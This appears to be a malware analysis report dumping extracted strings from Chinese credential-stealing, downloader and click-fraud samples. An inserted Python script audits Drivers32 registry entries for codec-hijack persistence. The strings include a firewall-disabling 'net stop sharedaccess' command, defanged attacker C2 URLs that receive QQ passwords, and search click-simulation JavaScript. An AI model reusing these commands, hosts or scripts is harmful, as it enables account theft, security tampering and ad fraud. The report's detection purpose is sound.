?t-P}.
?t-P}.
{b.BK
{b.BK
D%Xm"
D%Xm"
rKc%s?
rKc%s?
_M%SF
_M%SF
ut-f}
ut-f}
cHs.qW
cHs.qW
e:\-drxP:4
e:\-drxP:4
{M.aD
{M.aD
GCmDF
GCmDF
tCPuv
tCPuv
Hx#%x
Hx#%x
.WQ3 1AT
.WQ3 1AT
V.Uj-a
V.Uj-a
& .AL
& .AL
.vYUPw
.vYUPw
Q#\.Pt
Q#\.Pt
yoQN.rB
yoQN.rB
]}T%C'oC
]}T%C'oC
-.lhA
-.lhA
C^.AX%
C^.AX%
2%I%c
2%I%c
%xKyB
%xKyB
;b=Å’
;b=Å’
f.DBq
f.DBq
sm%Um
sm%Um
E:\#6
E:\#6
%d_i{
%d_i{
);%xl
);%xl
.dDG_I
.dDG_I
Aj.xs
Aj.xs
.DX{YV
.DX{YV
..z.Zb
..z.Zb
e?.RZ
e?.RZ
BR2Z.INpW
BR2Z.INpW
ZF.LH
ZF.LH
k%s.9/
k%s.9/
2
2
.dy.jkt
.dy.jkt
e:\.;
e:\.;
%F=@-
%F=@-
c.ctZ
c.ctZ
waL.DIz
waL.DIz
.BO R
.BO R
H"B%S
H"B%S
.wAqD
.wAqD
>rl .JMTG
>rl .JMTG
r%X~eg
r%X~eg
$6L.oiTJ
$6L.oiTJ
n%u4$
n%u4$
OE.jl
OE.jl
l6.rD
l6.rD
w}sqLQ
w}sqLQ
*0e3.uix
*0e3.uix
t/.aq9
t/.aq9
.CL5h
.CL5h
ZiC!F.NQ
ZiC!F.NQ
ki-G}
ki-G}
O.vdxj*S
O.vdxj*S
C9D.aN7&
C9D.aN7&
U:V%D
U:V%D
%FZ= K
%FZ= K
ZvL.Hs
ZvL.Hs
.wnJ\
.wnJ\
g
g
&%cG.
&%cG.
GD.hv
GD.hv
$>_%s
$>_%s
o#.ZJ]
o#.ZJ]
N>.cUX
N>.cUX
="u2%X}v
="u2%X}v
.EM{,
.EM{,
Jo.zMJ
Jo.zMJ
h.yqr
h.yqr
-as4}
-as4}
Ux
Ux
.ED%c
.ED%c
új=
új=
H\ 7%U
H\ 7%U
3q1%F
3q1%F
g-n%x
g-n%x
"2K.mE
"2K.mE
X%.ip]k
X%.ip]k
.KXz#
.KXz#
.aEf=
.aEf=
bB/%x@
bB/%x@
AG.ZR
AG.ZR
.xLsf
.xLsf
.wg8R
.wg8R
{dn.Py
{dn.Py
l6ú$
l6ú$
\uyT.sYr
\uyT.sYr
n.grm
n.grm
b.qtq
b.qtq
k]%Xvi
k]%Xvi
.BK1z$
.BK1z$
3[%F%
3[%F%
@.vu?0
@.vu?0
kWG.EQ
kWG.EQ
>\.hmU
>\.hmU
.jivI
.jivI
Eh.gS
Eh.gS
.=^.KJ
.=^.KJ
56%Du
56%Du
8.QN6
8.QN6
`d%S\h
`d%S\h
%X(J5
%X(J5
`.DJp
`.DJp
kBL%D
kBL%D
.ugZ6
.ugZ6
l81%F
l81%F
T%sB$
T%sB$
2t8.gc
2t8.gc
'.CP_
'.CP_
3~.MAnW
3~.MAnW
.rs>m
.rs>m
SZl%X
SZl%X
h%DmT)_
h%DmT)_
}.EL[
}.EL[
j=.hD^
j=.hD^
CRTz
CRTz
M( %C
M( %C
k"|wEb
k"|wEb
B.IF(0
B.IF(0
N@L%U
N@L%U
.GO1EH
.GO1EH
%clW!
%clW!
q$exe
q$exe
yl$.Lm
yl$.Lm
-g5%u
-g5%u
u \%X
u \%X
TG#.hz*r
TG#.hz*r
63n%c/
63n%c/
5.oY{
5.oY{
:.Sha
:.Sha
H]..vYA
H]..vYA
*T%?.ys
*T%?.ys
Hm.vF
Hm.vF
)^.gI
)^.gI
lqK.Wl
lqK.Wl
'.Wg2XN
'.Wg2XN
]Q%ScF
]Q%ScF
QW.SB
QW.SB
r.fAZ
r.fAZ
p .sf
p .sf
-H}_s
-H}_s
|O:%D!
|O:%D!
.gjNPK
.gjNPK
m0F?3u{#,%X
m0F?3u{#,%X
-wa}o
-wa}o
%F |J
%F |J
5.Oen
5.Oen
)Bv%c
)Bv%c
GN{%C(h0
GN{%C(h0
C.UDgo
C.UDgo
=$.mz
=$.mz
u>"%f/
u>"%f/
4eA%D
4eA%D
C6.yz
C6.yz
o.AHvyA
o.AHvyA
IM%%x6
IM%%x6
YCH.EL
YCH.EL
cSfq&%x'
cSfq&%x'
r.RR8
r.RR8
-.VA%
-.VA%
d EXe
d EXe
%DQ Ki
%DQ Ki
XyGG|`Zc.Hu&
XyGG|`Zc.Hu&
Ty.zg\
Ty.zg\
Q.tSF&
Q.tSF&
,.HTbH
,.HTbH
76e&%X
76e&%X
>rd.yo =b
>rd.yo =b
J&.tI
J&.tI
o:.TU
o:.TU
h%FP(
h%FP(
P.fNu
P.fNu
6%xhf
6%xhf
R@.Tf5w
R@.Tf5w
.od$"
.od$"
FTP8f35E\5
FTP8f35E\5
.fknk
.fknk
D&%XB
D&%XB
q.sG4
q.sG4
$A4i.rK2k
$A4i.rK2k
Qi.nnS
Qi.nnS
C}.BC
C}.BC
7mSgf
7mSgf
S
S
=Gc7:5R.od>D
=Gc7:5R.od>D
& r%s
& r%s
&C%s;
&C%s;
fK.ue
fK.ue
k-bF}i
k-bF}i
6.ifl
6.ifl
O%xBs
O%xBs
&-0};d*w
&-0};d*w
W%d,D&
W%d,D&
%FK9RZ
%FK9RZ
.PfyT
.PfyT
%D}&zP
%D}&zP
v.Pg&
v.Pg&
l:z`.ya
l:z`.ya
!E.FsM
!E.FsM
Ip.XF
Ip.XF
D%xUz
D%xUz
d6.NOX
d6.NOX
%D)%^";"(|
%D)%^";"(|
%FS?h.
%FS?h.
I$DAn.zU
I$DAn.zU
?)%fW
$0A%u2
$0A%u2
2qep%U
2qep%U
.lne`
.lne`
.UGC9
.UGC9
.OYXjM
.OYXjM
[.kk8"
[.kk8"
_%XAA
_%XAA
)v.Fqm
)v.Fqm
tP"%dK
tP"%dK
}h.aen
}h.aen
)=.JB
)=.JB
E.krs
E.krs
%S;]NDA
%S;]NDA
vË8
vË8
@.zP*m
@.zP*m
LCb&w%Sh
LCb&w%Sh
lc.Lj;
lc.Lj;
.fMnjVwA8Ve
.fMnjVwA8Ve
)%C::x
)%C::x
-D}Ba
-D}Ba
w.oyr,
w.oyr,
w.BL$
w.BL$
'u%Xioc
'u%Xioc
J0.Wn
J0.Wn
.pHe7xP3
.pHe7xP3
I%X}-4
I%X}-4
?.lP"
?.lP"
.Jfrr
.Jfrr
z%X[G
z%X[G
u.jG'
u.jG'
.MdBF
.MdBF
u;|WJ%Ud$`
u;|WJ%Ud$`
-s}k'
-s}k'
%uwY6
%uwY6
.Dzew
.Dzew
}/}.zd
}/}.zd
]0%sH'
]0%sH'
5B%FX
5B%FX
!%snD
!%snD
?.eQy
?.eQy
Z(.lV
Z(.lV
Q`k%d
Q`k%d
,.mi0
,.mi0
~_.fK
~_.fK
\.mkS
\.mkS
W%U35
W%U35
.DyT'
.DyT'
i.yxd
i.yxd
.GR$j
.GR$j
7.FB2
7.FB2
,.YI}
,.YI}
.Moj,
.Moj,
.ENMo
.ENMo
\sM.CJ
\sM.CJ
m.rRm/_
m.rRm/_
HaK.Gp
HaK.Gp
>Ut.zZ4p
>Ut.zZ4p
=T.NC
=T.NC
x5.wMKic&D
x5.wMKic&D
Ap=wv/'~.Ac
Ap=wv/'~.Ac
b%CTr
b%CTr
wEbq
wEbq
k8.fs
k8.fs
S>D%cM@
S>D%cM@
P e.ns
P e.ns
cc.Lcr
cc.Lcr
xC.sP
xC.sP
!.HT]
!.HT]
.OOIs
.OOIs
.MSEq.
.MSEq.
.db]gV
.db]gV
%S1uM
%S1uM
>4Zs.Mg
>4Zs.Mg
.lzHe
.lzHe
x%S=qg
x%S=qg
3*.Ilu
3*.Ilu
.ovue
.ovue
*.jd9b
*.jd9b
Xx.Ce.
Xx.Ce.
3.SZd
3.SZd
/.ezv
/.ezv
`aI%uk
`aI%uk
O.iGK
O.iGK
pA/\5.XE
pA/\5.XE
nS%cq
nS%cq
8Z.XS1
8Z.XS1
>..Li
>..Li
.rWVj
.rWVj
.Ls9r
.Ls9r
[wi.ls7
[wi.ls7
p .XX
p .XX
)7.iQkb
)7.iQkb
hS].qp
hS].qp
[Ch.fCR
[Ch.fCR
I:>0`%F
I:>0`%F
,(3%u
,(3%u
p.QG~h
p.QG~h
%FQL6
%FQL6
%UJ3{
%UJ3{
%uA1"Vz
%uA1"Vz
U:{.bZ
U:{.bZ
.QnJg
.QnJg
.oNmV
.oNmV
#pTB-X}U
#pTB-X}U
{^V%d
{^V%d
c2@%xb
c2@%xb
5.RF0
5.RF0
\c.vfn
\c.vfn
8P.YKI
8P.YKI
? -\*:\>
? -\*:\>
$SQl'g
$SQl'g
$%c 4
$%c 4
TCPg
TCPg
%d'KX))8$
%d'KX))8$
/4k.hh;
/4k.hh;
)4.KM>
)4.KM>
`>%S~6
`>%S~6
.az2?>
.az2?>
b.TtF
b.TtF
a*[L%dR
a*[L%dR
~0.er
~0.er
G5.jo,!
G5.jo,!
q.bj>
q.bj>
Hq%FR
Hq%FR
H%U6u
H%U6u
Ob%Xc
Ob%Xc
o.hWB(
o.hWB(
<.uri>
<.uri>
.lN5B
.lN5B
V\.CS
V\.CS
Urld
Urld
&.cgow:>S$
&.cgow:>S$
yC.vI
yC.vI
.Vwx^4
.Vwx^4
eH.WD
eH.WD
sV-b}
sV-b}
ÃŒQ4
ÃŒQ4
^${.Nvf
^${.Nvf
.pk1G
.pk1G
.Ulhs
.Ulhs
S.Nla
S.Nla
1, 0, 0, 1
AliIM.exe
FprqlspZxc.EXE_1288:
`.rsrc
f9z.vk
cmd /c net stop alg /y&net stop sharedaccess
hXXp://183.57.57.192:7890/QQ/QQfm.txt
smqqv0.6hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
hXXp://183.57.57.192:7890/QQ/dsm.txt&s_url=http://dnf.qq.com/act/a20090219dltb/&f_url=&ptlang=2052&ptredirect=101&aid=21000127&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0
&service=login&nodirect=0&ptsig=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://183.57.57.192:7890/QQ/d2.txt&Beta=0.155&Ques=
&Pass=
hXXp://183.57.57.192:7890/QQ/ljxiazaidizhi.txt
(7),01444
'9=82<.342>
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=dnf&area=
&msg=
183.57.57.192
hXXp://183.61.164.199:989/grqif3/qq.asp
hXXp://captcha.qq.com/getimage?aid=11000101&uin=
&_=139763802
hXXp://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
Adodb.Stream
@hXXp://aq.qq.com/cn2/index
hXXp://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?t=0.
hXXp://183.57.57.192:7890/QQ/QQh.txt
hXXp://183.57.57.192:7890/QQ/hmsx2.txt&aid=21000127&u1=http://dnf.qq.com/act/a20090219dltb/&h=1&ptredirect=1&ptlang=2052&daid=8&from_ui=1&dumy=&low_login_enable=0&regmaster=&fp=loginerroralert&action=16-116-1389436820937&mibao_css=&t=2&g=1&js_ver=10063&js_type=1&login_sig=knHhTNFwQthq*GSFdpsyF6EaS8*jMteBFqJBsJiCmMR8bkYQuLD6LJlF-7k4h0Qx&pt_rsa=0
hXXp://ptlogin2.qq.com/login?u=
hXXp://ui.ptlogin2.qq.com/cgi-bin/mibao_vry
hXXp://aq.qq.com/cn/services/abnormal/abnormal_index
&s_url
var hexcase=1;var b64pad="";var chrsz=8;var mode=32;function md5(A){return hex_md5(A)}function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128>>9)16){E=core_md5(E,C.length*chrsz)}var A=Array(16),D=Array(16);for(var B=0;B>16) (D>>16) (C>>16);return(B>>(32-B))}function str2binl(D){var C=Array();var A=(1>5]|=(D.charCodeAt(B/chrsz)&A)>5]>>>(B2))&A)}return D}function binl2hex(C){var B=hexcase?"0123456789ABCDEF":"0123456789abcdef";var D="";for(var A=0;A>2]>>((A%4)*8 4))&15) B.charAt((C[A>>2]>>((A%4)*8))&15)}return D}function binl2b64(D){var C="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";var F="";for(var B=0;B>2]>>8*(B%4))&255)>2]>>8*((B 1)%4))&255)>2]>>8*((B 2)%4))&255);for(var A=0;AD.length*32){F =b64pad}else{F =C.charAt((E>>6*(3-A))&63)}}}return F}function hexchar2bin(str){var arr=[];for(var i=0;i
GetPassword
hXXp://183.57.57.192:7890/QQ/qqswkg.txt
hXXp://183.57.57.192:7890/QQ/qqsw.txt&appid=636014201&js_ver=10099&js_type=1&login_sig=323TOjfY38GbVwqlKxXqKdw*x*RnJtBXEtcjtf0CwU-izFSsCW1OnY5uOYgHv7Nx&u1=http://VVV.qq.com/qq2012/loginSuccess.htm&r=0.
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
qq.exe
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
VBScript.RegExp
LocationURL
Y@ExecuteStatement
wininet.dll
WinINet.dll
urlmon
kernel32.dll
ole32.dll
user32.dll
gdi32.dll
oleaut32.dll
atl.dll
shell32.dll
User32.dll
ws2_32.dll
msimg32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
URLDownloadToFileA
GetAsyncKeyState
GetProcessHeap
RegisterHotKey
UnregisterHotKey
program internal error number is %d.
:"%s"
:"%s".
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ATL.DLL
GDI32.dll
MSIMG32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WININET.dll
WS2_32.dll
Microsoft(R) Windows(R) Operating System
5.2.3790.3959
install.exe
FprqlspZxc.EXE_1288_rwx_00401000_000C4000:
CqxpeonGez.EXE_904:
`.rsrc
tGHt.Ht&
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
(3-!0,1'8"5.*2$
svchost.exe
ntdll.dll
Kernel32.dll
X-X-X-X-X-X
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
%System%
xxxooo1.exe
121.12.170.42
hXXp://121.12.115.213:1024/
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
.?AVCTCPClient_FT@@
.?AVCXWebBrowser@@
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
.text
`.rdata
@.data
.rsrc
@.reloc
hXXp://VVV.it885.com.cn/web/
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
EnumChildWindows
EnumDesktopWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
WS2_32.dll
GetCPInfo
360try_dll.dll
GET %s HTTP/1.1
Referer: %s
Accept-Language: %s
User-Agent: %s
Host: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
%s-%x
%%X
%s "%s"
Applications\iexplore.exe\shell\open\command
error find windows
uRlp
n%c$Eo!y
.OVWc
.IL([
p%u7V
Bu.hh3
2%ScG
%u;)C&>
G6C.kwFt
v#%I%f
R.LsX
%5SLY
PF.gc g
File%d
PMsg
j.DLL7(
v%*.*
asss>X-
Supported
pen6execJw
{CTED/MSVCRT_P
b.do5p
a,&.xml
valucmdn0epy
=\/?!>
0p.Dl7;d
zcÃ
%XB ]CG
OKey
aTUrlMkSO3
=iM.Mj(
KERNEL32.DLL
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEPRO32.DLL
urlmon.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WSOCK32.dll
RegOpenKeyA
UrlMkSetSessionOption
svchost.exe
IEXPLORE.EXE
%srunpage.asp
%s%s&machinename=%s&cr=yes
get_ad4.asp?type=loadall
EndViewRun.dll
OneClickRun.dll
Wsock3.dll
NoViewRun2.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
%System%\l3codeca.acm
msacm32.drv
%sclick_log2.asp?ad_url=%s&cr=yes
%s\%s
2!2'2-282@2
FtPh
MEK%C
3MHL.TX
-c.YY,
.kIIlzx
Q{.UPC
.INC`*K@
5.Sw,5
6%F;%2
Wu.ou
T.Zfl
'pen,inmm.dll
Z7i.ctSoundCB
`Us.32.DLV%d
a.asp
%^&*()_
=xzgWEBe B
.Sa3X
.toLowerCase()x
O1.rwdns
\C2.jV
zl.oc#l76~wx
Msgw
FgNotSupportedQ
sHTTP
:7pr.ocol\
d.xB;
mG.iG8
_C.dG
zwsp.fQ
SHLWAPI.dll
RegEnumKeyA
GetWindowsDirectoryA
GetProcessHeap
GetConsoleOutputCP
NETAPI32.dll
PSAPI.DLL
mscoree.dll
1, 0, 0, 0
AuotIE.exe
AutoIE.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.1
Client.exe
CqxpeonGez.EXE_904_rwx_00401000_00086000:
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
svchost.exe
ntdll.dll
Kernel32.dll
X-X-X-X-X-X
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
%System%
xxxooo1.exe
121.12.170.42
hXXp://121.12.115.213:1024/
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
.?AVCTCPClient_FT@@
.?AVCXWebBrowser@@
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
.text
`.rdata
@.data
.rsrc
@.reloc
hXXp://VVV.it885.com.cn/web/
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
EnumChildWindows
EnumDesktopWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
WS2_32.dll
GetCPInfo
360try_dll.dll
GET %s HTTP/1.1
Referer: %s
Accept-Language: %s
User-Agent: %s
Host: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
%s-%x
%%X
%s "%s"
Applications\iexplore.exe\shell\open\command
error find windows
File%d
PMsg
KERNEL32.DLL
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEPRO32.DLL
urlmon.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WSOCK32.dll
RegOpenKeyA
UrlMkSetSessionOption
svchost.exe
IEXPLORE.EXE
%srunpage.asp
%s%s&machinename=%s&cr=yes
get_ad4.asp?type=loadall
EndViewRun.dll
OneClickRun.dll
Wsock3.dll
NoViewRun2.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
%System%\l3codeca.acm
msacm32.drv
%sclick_log2.asp?ad_url=%s&cr=yes
%s\%s
SHLWAPI.dll
RegEnumKeyA
GetWindowsDirectoryA
GetProcessHeap
GetConsoleOutputCP
mscoree.dll
1, 0, 0, 0
AuotIE.exe
AutoIE.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.
An unsupported operation was attempted.
A required resource was unavailable.
Command failed.
Insufficient memory to perform operation.
System registry entries have been removed and the INI file (if any) was deleted.
Not all of the system registry entries (or INI file) were removed.
This program requires the file %s, which was not found on this system.
This program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.
Unable to read from %1, it is opened by someone else.
Unable to write to %1, it is read-only or opened by someone else.
An unexpected error occurred while reading %1.
An unexpected error occurred while writing %1.
Unable to load mail system support.
Access to %1 was denied.
An invalid file handle was associated with %1.
Seek failed on
A hardware I/O error was reported while accessing %1.
A sharing violation occurred while accessing %1.
A locking violation occurred while accessing %1.
Disk full while accessing %1.
An attempt was made to access %1 past its end.
No error occurred.
An unknown error occurred while accessing %1.
An attempt was made to write to the reading %1.
An attempt was made to access %1 past its end.
An attempt was made to read from the writing %1.
1.0.0.1
Client.exe
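The CqxpeonGez.EXE strings reference the Drivers32 key, msacm32.drv and %System%\l3codeca.acm, but the report does not show which value is written. Values under Drivers32 name the codec and mapper modules that winmm/msacm load into processes using the waveOut, ACM or VfW APIs, so a foreign entry there is a DLL-load persistence vector. The following is an added example, not the report's or the malware's code: it parses a `reg export` of Drivers32 (the sample export and the baseline table are constructed; the baseline must be replaced with an export from a known-clean host of the same Windows build) and flags entries that deviate from it.

```python
"""Audit a `reg export` of Drivers32 for hijacked codec/mapper entries (added example)."""
import re

# Illustrative baseline (assumption): value name -> expected bare file name.
# Replace with an export from a clean host of the same build before use.
BASELINE = {
    "wavemapper": "msacm32.drv",
    "midimapper": "midimap.dll",
    "msacm.l3acm": "l3codeca.acm",
    "msacm.imaadpcm": "imaadp32.acm",
    "msacm.msadpcm": "msadp32.acm",
    "msacm.msg711": "msg711.acm",
    "msacm.msgsm610": "msgsm32.acm",
    "vidc.mrle": "msrle32.dll",
    "vidc.msvc": "msvidc32.dll",
    "vidc.cvid": "iccvid.dll",
}

# Constructed sample of:  reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32" d.reg
# Two entries are planted: one absolute path into the dropper's DownloadSave
# directory, and one value name the baseline does not know.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"wavemapper"="msacm32.drv"
"midimapper"="midimap.dll"
"msacm.l3acm"="l3codeca.acm"
"msacm.imaadpcm"="imaadp32.acm"
"msacm.msadpcm"="msadp32.acm"
"msacm.msg711"="msg711.acm"
"msacm.msgsm610"="msgsm32.acm"
"vidc.mrle"="msrle32.dll"
"vidc.msvc"="C:\\Documents and Settings\\All Users\\Application Data\\DownloadSave\\msvidc32.dll"
"vidc.cvid"="iccvid.dll"
"msacm.wqdl"="xxxooo1.acm"
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_drivers32(reg_text):
    """Return {value_name: data} for the Drivers32 block of a .reg export."""
    entries = {}
    in_key = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.lower().endswith("\\drivers32]")
            continue
        if not in_key:
            continue
        m = VALUE_RE.match(line)
        if m:
            # .reg exports escape every backslash as '\\'
            entries[m.group("name")] = m.group("data").replace("\\\\", "\\")
    return entries


def audit_drivers32(entries, baseline=BASELINE):
    """Flag values that deviate from the baseline; returns (name, data, reason) tuples.

    Checks, in order: an absolute path (defaults are bare file names resolved
    from System32, so a path means a foreign load location); a value name the
    baseline lacks (a new codec entry is a new load); a known name whose file
    differs.  A matching bare name can still be a replaced file on disk, so the
    caller should hash every file returned by files_to_hash() separately.
    """
    findings = []
    for name, data in entries.items():
        lname = name.lower()
        if "\\" in data or "/" in data:
            findings.append((name, data, "absolute path outside default lookup"))
        elif lname not in baseline:
            findings.append((name, data, "value not in baseline"))
        elif data.lower() != baseline[lname].lower():
            findings.append((name, data, "file name differs from baseline"))
    return findings


def files_to_hash(entries):
    """Bare file names the audit cannot clear by name alone (hash them in %System%)."""
    return sorted({d for d in entries.values() if "\\" not in d and "/" not in d})


if __name__ == "__main__":
    parsed = parse_drivers32(SAMPLE_REG)
    for name, data, why in audit_drivers32(parsed):
        print(f"{name:16} -> {data}  [{why}]")
    print("hash in %System%:", ", ".join(files_to_hash(parsed)))
```

Run it against a real export by replacing SAMPLE_REG with the file contents; the baseline comparison is only as good as the clean export it was taken from, and a bare name such as l3codeca.acm that matches the baseline still needs its on-disk file hashed, since the dropper's strings name exactly that path.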
svchost.exe_232:
`.rsrc
Winmm.dll
DSound.dll
User32.DLL
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Referer: hXXp://VVV.baidu.com/s
Content-Type:application/x-www-form-urlencoded;
GetData.asp
SetData.asp
0.0.0.0
VVV.baidu.com/s?
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
hXXp://VVV.baidu.com/s?wd=
url=url.toLowerCase();
hXXp://VVV.baidu.com/
VVV.baidu.com
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/
ntdll.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s.dll
CCmdTarget
COMCTL32.DLL
hhctrl.ocx
commctrl_DragListMsg
CNotSupportedException
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
MSWHEEL_ROLLMSG
user32.dll
ole32.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
OLEACC.dll
c:\Documents and Settings\Administrator\
\Suphit\Suphit6_Client\Client\Release\Client.pdb
SHELL32.dll
.?AVCCmdTarget@@
.PAVCMemoryException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
%System%\svchost.exe
GetCPInfo
RegOpenKeyExA
RegDeleteKeyA
RegEnumKeyA
RegOpenKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
UrlUnescapeA
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
HttpOpenRequestA
InternetOpenUrlA
HttpSendRequestA
HttpQueryInfoA
HttpAddRequestHeadersA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
OLEAUT32.dll
oledlg.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINSPOOL.DRV
WS2_32.dll
var rnd = 500 + parseInt(2000*Math.random());
if (el.value==kw){return true} else{return false}
el.click && el.click();
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
i = 1 + rnd; if (i>kw.length){i=kw.length};
var rnd = parseInt(2*Math.random());
if(i
var kwNode = kw.substring(0,i);
el.value=kw;
el.focus();
el.value='';
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
el.fireEvent('onkeyup');
el.fireEvent('onkeydown');
} else if (el.fireEvent) {
el.dispatchEvent(evt);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('KeyEvents');
if (document.createEvent) {
node.click && node.click();
if (node.innerHTML == '
var length = allNodes.length;
var allNodes = document.getElementsByTagName('a');
if(ESubmit.value == '
'){ESubmit.value = 'false';}
ESubmit.value = 'ok';
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
if (5*Math.random()
if (g_url==url){
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
ESubmit.value = IntPaimin.toString();
if (g_url==url.substring(1,21) + '...'){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
var g_url = GetUrl(g);
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var t_a = t.item(0).getElementsByTagName('a');
if (!t.item(0)) {continue;}
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
for (var i=0;i
var content_left = document.getElementById('content_left');
var url='
var result = re.exec(g_a);
g_a=g_a.replace('','');
g_a=g_a.replace('','');
